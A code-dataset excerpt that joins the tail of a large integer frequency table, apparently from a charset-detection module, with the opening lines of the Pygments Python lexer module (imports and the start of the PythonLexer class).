9716,9717,9718,9719,9720,9721,9722,9723,9724,9725,9726,9727,9728,9729,9730,9731, # 9536
9732,9733,9734,9735,4912,9736,9737,9738,9739,9740,4913,9741,9742,9743,9744,9745, # 9552
9746,9747,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9758,4914,9759,9760, # 9568
9761,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9774,9775,9776, # 9584
9777,9778,9779,9780,9781,9782,4915,9783,9784,9785,9786,9787,9788,9789,9790,9791, # 9600
9792,9793,4916,9794,9795,9796,9797,9798,9799,9800,9801,9802,9803,9804,9805,9806, # 9616
9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822, # 9632
9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838, # 9648
9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854, # 9664
9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,4917,9869, # 9680
9870,9871,9872,9873,9874,9875,9876,9877,9878,9879,9880,9881,9882,9883,9884,9885, # 9696
9886,9887,9888,9889,9890,9891,9892,4472,9893,9894,9895,9896,9897,3806,9898,9899, # 9712
9900,9901,9902,9903,9904,9905,9906,9907,9908,9909,9910,9911,9912,9913,9914,4918, # 9728
9915,9916,9917,4919,9918,9919,9920,9921,4184,9922,9923,9924,9925,9926,9927,9928, # 9744
9929,9930,9931,9932,9933,9934,9935,9936,9937,9938,9939,9940,9941,9942,9943,9944, # 9760
9945,9946,4920,9947,9948,9949,9950,9951,9952,9953,9954,9955,4185,9956,9957,9958, # 9776
9959,9960,9961,9962,9963,9964,9965,4921,9966,9967,9968,4473,9969,9970,9971,9972, # 9792
9973,9974,9975,9976,9977,4474,9978,9979,9980,9981,9982,9983,9984,9985,9986,9987, # 9808
9988,9989,9990,9991,9992,9993,9994,9995,9996,9997,9998,9999,10000,10001,10002,10003, # 9824
10004,10005,10006,10007,10008,10009,10010,10011,10012,10013,10014,10015,10016,10017,10018,10019, # 9840
10020,10021,4922,10022,4923,10023,10024,10025,10026,10027,10028,10029,10030,10031,10032,10033, # 9856
10034,10035,10036,10037,10038,10039,10040,10041,10042,10043,10044,10045,10046,10047,10048,4924, # 9872
10049,10050,10051,10052,10053,10054,10055,10056,10057,10058,10059,10060,10061,10062,10063,10064, # 9888
10065,10066,10067,10068,10069,10070,10071,10072,10073,10074,10075,10076,10077,10078,10079,10080, # 9904
10081,10082,10083,10084,10085,10086,10087,4475,10088,10089,10090,10091,10092,10093,10094,10095, # 9920
10096,10097,4476,10098,10099,10100,10101,10102,10103,10104,10105,10106,10107,10108,10109,10110, # 9936
10111,2174,10112,10113,10114,10115,10116,10117,10118,10119,10120,10121,10122,10123,10124,10125, # 9952
10126,10127,10128,10129,10130,10131,10132,10133,10134,10135,10136,10137,10138,10139,10140,3807, # 9968
4186,4925,10141,10142,10143,10144,10145,10146,10147,4477,4187,10148,10149,10150,10151,10152, # 9984
10153,4188,10154,10155,10156,10157,10158,10159,10160,10161,4926,10162,10163,10164,10165,10166, #10000
10167,10168,10169,10170,10171,10172,10173,10174,10175,10176,10177,10178,10179,10180,10181,10182, #10016
10183,10184,10185,10186,10187,10188,10189,10190,10191,10192,3203,10193,10194,10195,10196,10197, #10032
10198,10199,10200,4478,10201,10202,10203,10204,4479,10205,10206,10207,10208,10209,10210,10211, #10048
10212,10213,10214,10215,10216,10217,10218,10219,10220,10221,10222,10223,10224,10225,10226,10227, #10064
10228,10229,10230,10231,10232,10233,10234,4927,10235,10236,10237,10238,10239,10240,10241,10242, #10080
10243,10244,10245,10246,10247,10248,10249,10250,10251,10252,10253,10254,10255,10256,10257,10258, #10096
10259,10260,10261,10262,10263,10264,10265,10266,10267,10268,10269,10270,10271,10272,10273,4480, #10112
4928,4929,10274,10275,10276,10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287, #10128
10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298,10299,10300,10301,10302,10303, #10144
10304,10305,10306,10307,10308,10309,10310,10311,10312,10313,10314,10315,10316,10317,10318,10319, #10160
10320,10321,10322,10323,10324,10325,10326,10327,10328,10329,10330,10331,10332,10333,10334,4930, #10176
10335,10336,10337,10338,10339,10340,10341,10342,4931,10343,10344,10345,10346,10347,10348,10349, #10192
10350,10351,10352,10353,10354,10355,3088,10356,2786,10357,10358,10359,10360,4189,10361,10362, #10208
10363,10364,10365,10366,10367,10368,10369,10370,10371,10372,10373,10374,10375,4932,10376,10377, #10224
10378,10379,10380,10381,10382,10383,10384,10385,10386,10387,10388,10389,10390,10391,10392,4933, #10240
10393,10394,10395,4934,10396,10397,10398,10399,10400,10401,10402,10403,10404,10405,10406,10407, #10256
10408,10409,10410,10411,10412,3446,10413,10414,10415,10416,10417,10418,10419,10420,10421,10422, #10272
10423,4935,10424,10425,10426,10427,10428,10429,10430,4936,10431,10432,10433,10434,10435,10436, #10288
10437,10438,10439,10440,10441,10442,10443,4937,10444,10445,10446,10447,4481,10448,10449,10450, #10304
10451,10452,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10463,10464,10465,10466, #10320
10467,10468,10469,10470,10471,10472,10473,10474,10475,10476,10477,10478,10479,10480,10481,10482, #10336
10483,10484,10485,10486,10487,10488,10489,10490,10491,10492,10493,10494,10495,10496,10497,10498, #10352
10499,10500,10501,10502,10503,10504,10505,4938,10506,10507,10508,10509,10510,2552,10511,10512, #10368
10513,10514,10515,10516,3447,10517,10518,10519,10520,10521,10522,10523,10524,10525,10526,10527, #10384
10528,10529,10530,10531,10532,10533,10534,10535,10536,10537,10538,10539,10540,10541,10542,10543, #10400
4482,10544,4939,10545,10546,10547,10548,10549,10550,10551,10552,10553,10554,10555,10556,10557, #10416
10558,10559,10560,10561,10562,10563,10564,10565,10566,10567,3676,4483,10568,10569,10570,10571, #10432
10572,3448,10573,10574,10575,10576,10577,10578,10579,10580,10581,10582,10583,10584,10585,10586, #10448
10587,10588,10589,10590,10591,10592,10593,10594,10595,10596,10597,10598,10599,10600,10601,10602, #10464
10603,10604,10605,10606,10607,10608,10609,10610,10611,10612,10613,10614,10615,10616,10617,10618, #10480
10619,10620,10621,10622,10623,10624,10625,10626,10627,4484,10628,10629,10630,10631,10632,4940, #10496
10633,10634,10635,10636,10637,10638,10639,10640,10641,10642,10643,10644,10645,10646,10647,10648, #10512
10649,10650,10651,10652,10653,10654,10655,10656,4941,10657,10658,10659,2599,10660,10661,10662, #10528
10663,10664,10665,10666,3089,10667,10668,10669,10670,10671,10672,10673,10674,10675,10676,10677, #10544
10678,10679,10680,4942,10681,10682,10683,10684,10685,10686,10687,10688,10689,10690,10691,10692, #10560
10693,10694,10695,10696,10697,4485,10698,10699,10700,10701,10702,10703,10704,4943,10705,3677, #10576
10706,10707,10708,10709,10710,10711,10712,4944,10713,10714,10715,10716,10717,10718,10719,10720, #10592
10721,10722,10723,10724,10725,10726,10727,10728,4945,10729,10730,10731,10732,10733,10734,10735, #10608
10736,10737,10738,10739,10740,10741,10742,10743,10744,10745,10746,10747,10748,10749,10750,10751, #10624
10752,10753,10754,10755,10756,10757,10758,10759,10760,10761,4946,10762,10763,10764,10765,10766, #10640
10767,4947,4948,10768,10769,10770,10771,10772,10773,10774,10775,10776,10777,10778,10779,10780, #10656
10781,10782,10783,10784,10785,10786,10787,10788,10789,10790,10791,10792,10793,10794,10795,10796, #10672
10797,10798,10799,10800,10801,10802,10803,10804,10805,10806,10807,10808,10809,10810,10811,10812, #10688
10813,10814,10815,10816,10817,10818,10819,10820,10821,10822,10823,10824,10825,10826,10827,10828, #10704
10829,10830,10831,10832,10833,10834,10835,10836,10837,10838,10839,10840,10841,10842,10843,10844, #10720
10845,10846,10847,10848,10849,10850,10851,10852,10853,10854,10855,10856,10857,10858,10859,10860, #10736
10861,10862,10863,10864,10865,10866,10867,10868,10869,10870,10871,10872,10873,10874,10875,10876, #10752
10877,10878,4486,10879,10880,10881,10882,10883,10884,10885,4949,10886,10887,10888,10889,10890, #10768
10891,10892,10893,10894,10895,10896,10897,10898,10899,10900,10901,10902,10903,10904,10905,10906, #10784
10907,10908,10909,10910,10911,10912,10913,10914,10915,10916,10917,10918,10919,4487,10920,10921, #10800
10922,10923,10924,10925,10926,10927,10928,10929,10930,10931,10932,4950,10933,10934,10935,10936, #10816
10937,10938,10939,10940,10941,10942,10943,10944,10945,10946,10947,10948,10949,4488,10950,10951, #10832
10952,10953,10954,10955,10956,10957,10958,10959,4190,10960,10961,10962,10963,10964,10965,10966, #10848
10967,10968,10969,10970,10971,10972,10973,10974,10975,10976,10977,10978,10979,10980,10981,10982, #10864
10983,10984,10985,10986,10987,10988,10989,10990,10991,10992,10993,10994,10995,10996,10997,10998, #10880
10999,11000,11001,11002,11003,11004,11005,11006,3960,11007,11008,11009,11010,11011,11012,11013, #10896
11014,11015,11016,11017,11018,11019,11020,11021,11022,11023,11024,11025,11026,11027,11028,11029, #10912
11030,11031,11032,4951,11033,11034,11035,11036,11037,11038,11039,11040,11041,11042,11043,11044, #10928
11045,11046,11047,4489,11048,11049,11050,11051,4952,11052,11053,11054,11055,11056,11057,11058, #10944
4953,11059,11060,11061,11062,11063,11064,11065,11066,11067,11068,11069,11070,11071,4954,11072, #10960
11073,11074,11075,11076,11077,11078,11079,11080,11081,11082,11083,11084,11085,11086,11087,11088, #10976
11089,11090,11091,11092,11093,11094,11095,11096,11097,11098,11099,11100,11101,11102,11103,11104, #10992
11105,11106,11107,11108,11109,11110,11111,11112,11113,11114,11115,3808,11116,11117,11118,11119, #11008
11120,11121,11122,11123,11124,11125,11126,11127,11128,11129,11130,11131,11132,11133,11134,4955, #11024
11135,11136,11137,11138,11139,11140,11141,11142,11143,11144,11145,11146,11147,11148,11149,11150, #11040
11151,11152,11153,11154,11155,11156,11157,11158,11159,11160,11161,4956,11162,11163,11164,11165, #11056
11166,11167,11168,11169,11170,11171,11172,11173,11174,11175,11176,11177,11178,11179,11180,4957, #11072
11181,11182,11183,11184,11185,11186,4958,11187,11188,11189,11190,11191,11192,11193,11194,11195, #11088
11196,11197,11198,11199,11200,3678,11201,11202,11203,11204,11205,11206,4191,11207,11208,11209, #11104
11210,11211,11212,11213,11214,11215,11216,11217,11218,11219,11220,11221,11222,11223,11224,11225, #11120
11226,11227,11228,11229,11230,11231,11232,11233,11234,11235,11236,11237,11238,11239,11240,11241, #11136
11242,11243,11244,11245,11246,11247,11248,11249,11250,11251,4959,11252,11253,11254,11255,11256, #11152
11257,11258,11259,11260,11261,11262,11263,11264,11265,11266,11267,11268,11269,11270,11271,11272, #11168
11273,11274,11275,11276,11277,11278,11279,11280,11281,11282,11283,11284,11285,11286,11287,11288, #11184
11289,11290,11291,11292,11293,11294,11295,11296,11297,11298,11299,11300,11301,11302,11303,11304, #11200
11305,11306,11307,11308,11309,11310,11311,11312,11313,11314,3679,11315,11316,11317,11318,4490, #11216
11319,11320,11321,11322,11323,11324,11325,11326,11327,11328,11329,11330,11331,11332,11333,11334, #11232
11335,11336,11337,11338,11339,11340,11341,11342,11343,11344,11345,11346,11347,4960,11348,11349, #11248
11350,11351,11352,11353,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365, #11264
11366,11367,11368,11369,11370,11371,11372,11373,11374,11375,11376,11377,3961,4961,11378,11379, #11280
11380,11381,11382,11383,11384,11385,11386,11387,11388,11389,11390,11391,11392,11393,11394,11395, #11296
11396,11397,4192,11398,11399,11400,11401,11402,11403,11404,11405,11406,11407,11408,11409,11410, #11312
11411,4962,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11424,11425, #11328
11426,11427,11428,11429,11430,11431,11432,11433,11434,11435,11436,11437,11438,11439,11440,11441, #11344
11442,11443,11444,11445,11446,11447,11448,11449,11450,11451,11452,11453,11454,11455,11456,11457, #11360
11458,11459,11460,11461,11462,11463,11464,11465,11466,11467,11468,11469,4963,11470,11471,4491, #11376
11472,11473,11474,11475,4964,11476,11477,11478,11479,11480,11481,11482,11483,11484,11485,11486, #11392
11487,11488,11489,11490,11491,11492,4965,11493,11494,11495,11496,11497,11498,11499,11500,11501, #11408
11502,11503,11504,11505,11506,11507,11508,11509,11510,11511,11512,11513,11514,11515,11516,11517, #11424
11518,11519,11520,11521,11522,11523,11524,11525,11526,11527,11528,11529,3962,11530,11531,11532, #11440
11533,11534,11535,11536,11537,11538,11539,11540,11541,11542,11543,11544,11545,11546,11547,11548, #11456
11549,11550,11551,11552,11553,11554,11555,11556,11557,11558,11559,11560,11561,11562,11563,11564, #11472
4193,4194,11565,11566,11567,11568,11569,11570,11571,11572,11573,11574,11575,11576,11577,11578, #11488
11579,11580,11581,11582,11583,11584,11585,11586,11587,11588,11589,11590,11591,4966,4195,11592, #11504
11593,11594,11595,11596,11597,11598,11599,11600,11601,11602,11603,11604,3090,11605,11606,11607, #11520
11608,11609,11610,4967,11611,11612,11613,11614,11615,11616,11617,11618,11619,11620,11621,11622, #11536
11623,11624,11625,11626,11627,11628,11629,11630,11631,11632,11633,11634,11635,11636,11637,11638, #11552
11639,11640,11641,11642,11643,11644,11645,11646,11647,11648,11649,11650,11651,11652,11653,11654, #11568
11655,11656,11657,11658,11659,11660,11661,11662,11663,11664,11665,11666,11667,11668,11669,11670, #11584
11671,11672,11673,11674,4968,11675,11676,11677,11678,11679,11680,11681,11682,11683,11684,11685, #11600
11686,11687,11688,11689,11690,11691,11692,11693,3809,11694,11695,11696,11697,11698,11699,11700, #11616
11701,11702,11703,11704,11705,11706,11707,11708,11709,11710,11711,11712,11713,11714,11715,11716, #11632
11717,11718,3553,11719,11720,11721,11722,11723,11724,11725,11726,11727,11728,11729,11730,4969, #11648
11731,11732,11733,11734,11735,11736,11737,11738,11739,11740,4492,11741,11742,11743,11744,11745, #11664
11746,11747,11748,11749,11750,11751,11752,4970,11753,11754,11755,11756,11757,11758,11759,11760, #11680
11761,11762,11763,11764,11765,11766,11767,11768,11769,11770,11771,11772,11773,11774,11775,11776, #11696
11777,11778,11779,11780,11781,11782,11783,11784,11785,11786,11787,11788,11789,11790,4971,11791, #11712
11792,11793,11794,11795,11796,11797,4972,11798,11799,11800,11801,11802,11803,11804,11805,11806, #11728
11807,11808,11809,11810,4973,11811,11812,11813,11814,11815,11816,11817,11818,11819,11820,11821, #11744
11822,11823,11824,11825,11826,11827,11828,11829,11830,11831,11832,11833,11834,3680,3810,11835, #11760
11836,4974,11837,11838,11839,11840,11841,11842,11843,11844,11845,11846,11847,11848,11849,11850, #11776
11851,11852,11853,11854,11855,11856,11857,11858,11859,11860,11861,11862,11863,11864,11865,11866, #11792
11867,11868,11869,11870,11871,11872,11873,11874,11875,11876,11877,11878,11879,11880,11881,11882, #11808
11883,11884,4493,11885,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897, #11824
11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913, #11840
11914,11915,4975,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928, #11856
11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944, #11872
11945,11946,11947,11948,11949,4976,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959, #11888
11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975, #11904
11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,4196,11988,11989,11990, #11920
11991,11992,4977,11993,11994,11995,11996,11997,11998,11999,12000,12001,12002,12003,12004,12005, #11936
12006,12007,12008,12009,12010,12011,12012,12013,12014,12015,12016,12017,12018,12019,12020,12021, #11952
12022,12023,12024,12025,12026,12027,12028,12029,12030,12031,12032,12033,12034,12035,12036,12037, #11968
12038,12039,12040,12041,12042,12043,12044,12045,12046,12047,12048,12049,12050,12051,12052,12053, #11984
12054,12055,12056,12057,12058,12059,12060,12061,4978,12062,12063,12064,12065,12066,12067,12068, #12000
12069,12070,12071,12072,12073,12074,12075,12076,12077,12078,12079,12080,12081,12082,12083,12084, #12016
12085,12086,12087,12088,12089,12090,12091,12092,12093,12094,12095,12096,12097,12098,12099,12100, #12032
12101,12102,12103,12104,12105,12106,12107,12108,12109,12110,12111,12112,12113,12114,12115,12116, #12048
12117,12118,12119,12120,12121,12122,12123,4979,12124,12125,12126,12127,12128,4197,12129,12130, #12064
12131,12132,12133,12134,12135,12136,12137,12138,12139,12140,12141,12142,12143,12144,12145,12146, #12080
12147,12148,12149,12150,12151,12152,12153,12154,4980,12155,12156,12157,12158,12159,12160,4494, #12096
12161,12162,12163,12164,3811,12165,12166,12167,12168,12169,4495,12170,12171,4496,12172,12173, #12112
12174,12175,12176,3812,12177,12178,12179,12180,12181,12182,12183,12184,12185,12186,12187,12188, #12128
12189,12190,12191,12192,12193,12194,12195,12196,12197,12198,12199,12200,12201,12202,12203,12204, #12144
12205,12206,12207,12208,12209,12210,12211,12212,12213,12214,12215,12216,12217,12218,12219,12220, #12160
12221,4981,12222,12223,12224,12225,12226,12227,12228,12229,12230,12231,12232,12233,12234,12235, #12176
4982,12236,12237,12238,12239,12240,12241,12242,12243,12244,12245,4983,12246,12247,12248,12249, #12192
4984,12250,12251,12252,12253,12254,12255,12256,12257,12258,12259,12260,12261,12262,12263,12264, #12208
4985,12265,4497,12266,12267,12268,12269,12270,12271,12272,12273,12274,12275,12276,12277,12278, #12224
12279,12280,12281,12282,12283,12284,12285,12286,12287,4986,12288,12289,12290,12291,12292,12293, #12240
12294,12295,12296,2473,12297,12298,12299,12300,12301,12302,12303,12304,12305,12306,12307,12308, #12256
12309,12310,12311,12312,12313,12314,12315,12316,12317,12318,12319,3963,12320,12321,12322,12323, #12272
12324,12325,12326,12327,12328,12329,12330,12331,12332,4987,12333,12334,12335,12336,12337,12338, #12288
12339,12340,12341,12342,12343,12344,12345,12346,12347,12348,12349,12350,12351,12352,12353,12354, #12304
12355,12356,12357,12358,12359,3964,12360,12361,12362,12363,12364,12365,12366,12367,12368,12369, #12320
12370,3965,12371,12372,12373,12374,12375,12376,12377,12378,12379,12380,12381,12382,12383,12384, #12336
12385,12386,12387,12388,12389,12390,12391,12392,12393,12394,12395,12396,12397,12398,12399,12400, #12352
12401,12402,12403,12404,12405,12406,12407,12408,4988,12409,12410,12411,12412,12413,12414,12415, #12368
12416,12417,12418,12419,12420,12421,12422,12423,12424,12425,12426,12427,12428,12429,12430,12431, #12384
12432,12433,12434,12435,12436,12437,12438,3554,12439,12440,12441,12442,12443,12444,12445,12446, #12400
12447,12448,12449,12450,12451,12452,12453,12454,12455,12456,12457,12458,12459,12460,12461,12462, #12416
12463,12464,4989,12465,12466,12467,12468,12469,12470,12471,12472,12473,12474,12475,12476,12477, #12432
12478,12479,12480,4990,12481,12482,12483,12484,12485,12486,12487,12488,12489,4498,12490,12491, #12448
12492,12493,12494,12495,12496,12497,12498,12499,12500,12501,12502,12503,12504,12505,12506,12507, #12464
12508,12509,12510,12511,12512,12513,12514,12515,12516,12517,12518,12519,12520,12521,12522,12523, #12480
12524,12525,12526,12527,12528,12529,12530,12531,12532,12533,12534,12535,12536,12537,12538,12539, #12496
12540,12541,12542,12543,12544,12545,12546,12547,12548,12549,12550,12551,4991,12552,12553,12554, #12512
12555,12556,12557,12558,12559,12560,12561,12562,12563,12564,12565,12566,12567,12568,12569,12570, #12528
12571,12572,12573,12574,12575,12576,12577,12578,3036,12579,12580,12581,12582,12583,3966,12584, #12544
12585,12586,12587,12588,12589,12590,12591,12592,12593,12594,12595,12596,12597,12598,12599,12600, #12560
12601,12602,12603,12604,12605,12606,12607,12608,12609,12610,12611,12612,12613,12614,12615,12616, #12576
12617,12618,12619,12620,12621,12622,12623,12624,12625,12626,12627,12628,12629,12630,12631,12632, #12592
12633,12634,12635,12636,12637,12638,12639,12640,12641,12642,12643,12644,12645,12646,4499,12647, #12608
12648,12649,12650,12651,12652,12653,12654,12655,12656,12657,12658,12659,12660,12661,12662,12663, #12624
12664,12665,12666,12667,12668,12669,12670,12671,12672,12673,12674,12675,12676,12677,12678,12679, #12640
12680,12681,12682,12683,12684,12685,12686,12687,12688,12689,12690,12691,12692,12693,12694,12695, #12656
12696,12697,12698,4992,12699,12700,12701,12702,12703,12704,12705,12706,12707,12708,12709,12710, #12672
12711,12712,12713,12714,12715,12716,12717,12718,12719,12720,12721,12722,12723,12724,12725,12726, #12688
12727,12728,12729,12730,12731,12732,12733,12734,12735,12736,12737,12738,12739,12740,12741,12742, #12704
12743,12744,12745,12746,12747,12748,12749,12750,12751,12752,12753,12754,12755,12756,12757,12758, #12720
12759,12760,12761,12762,12763,12764,12765,12766,12767,12768,12769,12770,12771,12772,12773,12774, #12736
12775,12776,12777,12778,4993,2175,12779,12780,12781,12782,12783,12784,12785,12786,4500,12787, #12752
12788,12789,12790,12791,12792,12793,12794,12795,12796,12797,12798,12799,12800,12801,12802,12803, #12768
12804,12805,12806,12807,12808,12809,12810,12811,12812,12813,12814,12815,12816,12817,12818,12819, #12784
12820,12821,12822,12823,12824,12825,12826,4198,3967,12827,12828,12829,12830,12831,12832,12833, #12800
12834,12835,12836,12837,12838,12839,12840,12841,12842,12843,12844,12845,12846,12847,12848,12849, #12816
12850,12851,12852,12853,12854,12855,12856,12857,12858,12859,12860,12861,4199,12862,12863,12864, #12832
12865,12866,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876,12877,12878,12879,12880, #12848
12881,12882,12883,12884,12885,12886,12887,4501,12888,12889,12890,12891,12892,12893,12894,12895, #12864
12896,12897,12898,12899,12900,12901,12902,12903,12904,12905,12906,12907,12908,12909,12910,12911, #12880
12912,4994,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925,12926, #12896
12927,12928,12929,12930,12931,12932,12933,12934,12935,12936,12937,12938,12939,12940,12941,12942, #12912
12943,12944,12945,12946,12947,12948,12949,12950,12951,12952,12953,12954,12955,12956,1772,12957, #12928
12958,12959,12960,12961,12962,12963,12964,12965,12966,12967,12968,12969,12970,12971,12972,12973, #12944
12974,12975,12976,12977,12978,12979,12980,12981,12982,12983,12984,12985,12986,12987,12988,12989, #12960
12990,12991,12992,12993,12994,12995,12996,12997,4502,12998,4503,12999,13000,13001,13002,13003, #12976
4504,13004,13005,13006,13007,13008,13009,13010,13011,13012,13013,13014,13015,13016,13017,13018, #12992
13019,13020,13021,13022,13023,13024,13025,13026,13027,13028,13029,3449,13030,13031,13032,13033, #13008
13034,13035,13036,13037,13038,13039,13040,13041,13042,13043,13044,13045,13046,13047,13048,13049, #13024
13050,13051,13052,13053,13054,13055,13056,13057,13058,13059,13060,13061,13062,13063,13064,13065, #13040
13066,13067,13068,13069,13070,13071,13072,13073,13074,13075,13076,13077,13078,13079,13080,13081, #13056
13082,13083,13084,13085,13086,13087,13088,13089,13090,13091,13092,13093,13094,13095,13096,13097, #13072
13098,13099,13100,13101,13102,13103,13104,13105,13106,13107,13108,13109,13110,13111,13112,13113, #13088
13114,13115,13116,13117,13118,3968,13119,4995,13120,13121,13122,13123,13124,13125,13126,13127, #13104
4505,13128,13129,13130,13131,13132,13133,13134,4996,4506,13135,13136,13137,13138,13139,4997, #13120
13140,13141,13142,13143,13144,13145,13146,13147,13148,13149,13150,13151,13152,13153,13154,13155, #13136
13156,13157,13158,13159,4998,13160,13161,13162,13163,13164,13165,13166,13167,13168,13169,13170, #13152
13171,13172,13173,13174,13175,13176,4999,13177,13178,13179,13180,13181,13182,13183,13184,13185, #13168
13186,13187,13188,13189,13190,13191,13192,13193,13194,13195,13196,13197,13198,13199,13200,13201, #13184
13202,13203,13204,13205,13206,5000,13207,13208,13209,13210,13211,13212,13213,13214,13215,13216, #13200
13217,13218,13219,13220,13221,13222,13223,13224,13225,13226,13227,4200,5001,13228,13229,13230, #13216
13231,13232,13233,13234,13235,13236,13237,13238,13239,13240,3969,13241,13242,13243,13244,3970, #13232
13245,13246,13247,13248,13249,13250,13251,13252,13253,13254,13255,13256,13257,13258,13259,13260, #13248
13261,13262,13263,13264,13265,13266,13267,13268,3450,13269,13270,13271,13272,13273,13274,13275, #13264
13276,5002,13277,13278,13279,13280,13281,13282,13283,13284,13285,13286,13287,13288,13289,13290, #13280
13291,13292,13293,13294,13295,13296,13297,13298,13299,13300,13301,13302,3813,13303,13304,13305, #13296
13306,13307,13308,13309,13310,13311,13312,13313,13314,13315,13316,13317,13318,13319,13320,13321, #13312
13322,13323,13324,13325,13326,13327,13328,4507,13329,13330,13331,13332,13333,13334,13335,13336, #13328
13337,13338,13339,13340,13341,5003,13342,13343,13344,13345,13346,13347,13348,13349,13350,13351, #13344
13352,13353,13354,13355,13356,13357,13358,13359,13360,13361,13362,13363,13364,13365,13366,13367, #13360
5004,13368,13369,13370,13371,13372,13373,13374,13375,13376,13377,13378,13379,13380,13381,13382, #13376
13383,13384,13385,13386,13387,13388,13389,13390,13391,13392,13393,13394,13395,13396,13397,13398, #13392
13399,13400,13401,13402,13403,13404,13405,13406,13407,13408,13409,13410,13411,13412,13413,13414, #13408
13415,13416,13417,13418,13419,13420,13421,13422,13423,13424,13425,13426,13427,13428,13429,13430, #13424
13431,13432,4508,13433,13434,13435,4201,13436,13437,13438,13439,13440,13441,13442,13443,13444, #13440
13445,13446,13447,13448,13449,13450,13451,13452,13453,13454,13455,13456,13457,5005,13458,13459, #13456
13460,13461,13462,13463,13464,13465,13466,13467,13468,13469,13470,4509,13471,13472,13473,13474, #13472
13475,13476,13477,13478,13479,13480,13481,13482,13483,13484,13485,13486,13487,13488,13489,13490, #13488
13491,13492,13493,13494,13495,13496,13497,13498,13499,13500,13501,13502,13503,13504,13505,13506, #13504
13507,13508,13509,13510,13511,13512,13513,13514,13515,13516,13517,13518,13519,13520,13521,13522, #13520
13523,13524,13525,13526,13527,13528,13529,13530,13531,13532,13533,13534,13535,13536,13537,13538, #13536
13539,13540,13541,13542,13543,13544,13545,13546,13547,13548,13549,13550,13551,13552,13553,13554, #13552
13555,13556,13557,13558,13559,13560,13561,13562,13563,13564,13565,13566,13567,13568,13569,13570, #13568
13571,13572,13573,13574,13575,13576,13577,13578,13579,13580,13581,13582,13583,13584,13585,13586, #13584
13587,13588,13589,13590,13591,13592,13593,13594,13595,13596,13597,13598,13599,13600,13601,13602, #13600
13603,13604,13605,13606,13607,13608,13609,13610,13611,13612,13613,13614,13615,13616,13617,13618, #13616
13619,13620,13621,13622,13623,13624,13625,13626,13627,13628,13629,13630,13631,13632,13633,13634, #13632
13635,13636,13637,13638,13639,13640,13641,13642,5006,13643,13644,13645,13646,13647,13648,13649, #13648
13650,13651,5007,13652,13653,13654,13655,13656,13657,13658,13659,13660,13661,13662,13663,13664, #13664
13665,13666,13667,13668,13669,13670,13671,13672,13673,13674,13675,13676,13677,13678,13679,13680, #13680
13681,13682,13683,13684,13685,13686,13687,13688,13689,13690,13691,13692,13693,13694,13695,13696, #13696
13697,13698,13699,13700,13701,13702,13703,13704,13705,13706,13707,13708,13709,13710,13711,13712, #13712
13713,13714,13715,13716,13717,13718,13719,13720,13721,13722,13723,13724,13725,13726,13727,13728, #13728
13729,13730,13731,13732,13733,13734,13735,13736,13737,13738,13739,13740,13741,13742,13743,13744, #13744
13745,13746,13747,13748,13749,13750,13751,13752,13753,13754,13755,13756,13757,13758,13759,13760, #13760
13761,13762,13763,13764,13765,13766,13767,13768,13769,13770,13771,13772,13773,13774,3273,13775, #13776
13776,13777,13778,13779,13780,13781,13782,13783,13784,13785,13786,13787,13788,13789,13790,13791, #13792
13792,13793,13794,13795,13796,13797,13798,13799,13800,13801,13802,13803,13804,13805,13806,13807, #13808
13808,13809,13810,13811,13812,13813,13814,13815,13816,13817,13818,13819,13820,13821,13822,13823, #13824
13824,13825,13826,13827,13828,13829,13830,13831,13832,13833,13834,13835,13836,13837,13838,13839, #13840
13840,13841,13842,13843,13844,13845,13846,13847,13848,13849,13850,13851,13852,13853,13854,13855, #13856
13856,13857,13858,13859,13860,13861,13862,13863,13864,13865,13866,13867,13868,13869,13870,13871, #13872
13872,13873,13874,13875,13876,13877,13878,13879,13880,13881,13882,13883,13884,13885,13886,13887, #13888
13888,13889,13890,13891,13892,13893,13894,13895,13896,13897,13898,13899,13900,13901,13902,13903, #13904
13904,13905,13906,13907,13908,13909,13910,13911,13912,13913,13914,13915,13916,13917,13918,13919, #13920
13920,13921,13922,13923,13924,13925,13926,13927,13928,13929,13930,13931,13932,13933,13934,13935, #13936
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa
| lgpl-2.1 |
sagangwee/sagangwee.github.io | build/pygments/build/lib.linux-i686-2.7/pygments/lexers/python.py | 43 | 36222 | # -*- coding: utf-8 -*-
"""
pygments.lexers.python
~~~~~~~~~~~~~~~~~~~~~~
Lexers for Python and related languages.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, include, bygroups, using, \
default, words, combined, do_insertions
from pygments.util import get_bool_opt, shebang_matches
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Generic, Other, Error
from pygments import unistring as uni
__all__ = ['PythonLexer', 'PythonConsoleLexer', 'PythonTracebackLexer',
'Python3Lexer', 'Python3TracebackLexer', 'CythonLexer',
'DgLexer', 'NumPyLexer']
line_re = re.compile('.*?\n')
class PythonLexer(RegexLexer):
"""
For `Python <http://www.python.org>`_ source code.
"""
name = 'Python'
